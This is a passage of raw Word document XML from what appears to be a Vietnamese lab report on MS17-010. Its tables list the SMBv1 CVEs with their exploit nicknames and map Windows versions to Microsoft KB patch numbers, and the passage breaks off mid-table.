              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>EternalSynergy</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> [10]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1A1EB56E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMBv1 Remote Code Execution Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2722FAC7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="03FB7884" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tham chiếu trong nhóm MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="4EE65AF6" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1926A9C6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0144</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7B4BC30E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>EternalBlue</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> [11]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2486DDC8" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">SMBv1 Remote Code Execution Vulnerability; EternalBlue khai thác lỗi xử lý FEA trong </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>srv.sys</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="64F7187F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7673ADFB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Mục tiêu thực nghiệm chính</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="56AF924A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="763C750B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0145</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0863137F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>EternalRomance</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> [12]</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5BEFA336" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMBv1 Remote Code Execution Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="135531AD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="465F7245" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Tham chiếu lịch sử / đối chiếu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="610B5723" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="288BF6D4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0146</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1C88E39B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không gắn nickname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="4A907AD0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMBv1 Remote Code Execution Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="23C45EAC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3F70AF8C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thuộc phạm vi MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="2D46B698" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0B1ACC49" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0147</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1E1BB595" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không gắn nickname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2811DD49" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMBv1 Information Disclosure Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="50631049" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Information Disclosure</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0374A766" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thuộc phạm vi MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="0CCAC393" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="0CD7A416" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>CVE-2017-0148</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="47BEA2AE" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Không gắn nickname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="7773BA02" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMBv1 Remote Code Execution Vulnerability</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2DB3E5E6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>RCE</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="6987761A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Thuộc phạm vi MS17-010</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="59BDA91B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="5C0D4E51" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:firstLine="576"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Sau Bảng 1.2, đề tài chỉ phân tích sâu cơ chế của CVE-2017-0144, vì đây là mục tiêu thực nghiệm trung tâm của kịch bản lab.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05826DA5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 1.3: Danh mục mã bản vá KB chính thức của Microsoft theo hệ điều hành Windows [5].</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1665"/>
        <w:gridCol w:w="1732"/>
        <w:gridCol w:w="1692"/>
        <w:gridCol w:w="2227"/>
        <w:gridCol w:w="1684"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w:rsidRPr="009A434D" w14:paraId="39A35A59" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="77B4FBD9" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Hệ điều hành</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="752EBAC6" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Phiên bản / Kiến trúc</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="1CC04361" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bản vá Security Only</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="16E5A70C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Bản vá Monthly Rollup / Cumulative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="034643CA" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRPr="009A434D" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
              <w:rPr>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
            </w:pPr>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>Ghi</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>chú</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>triển</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>khai</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r w:rsidRPr="009A434D">
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
                <w:lang w:val="fr-FR"/>
              </w:rPr>
              <w:t>lab</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="0D2FFF06" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4ACDEA7D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows 7 SP1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="58A9AC4E" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>x86 và x64</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="0043FF96" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="4BB0C966" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>KB4012215</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="582B38D4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Môi trường mục tiêu chính để kiểm tra trước và sau khi vá</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="1D235CC4" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="05575323" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Windows Server 2008 R2 SP1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1757" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
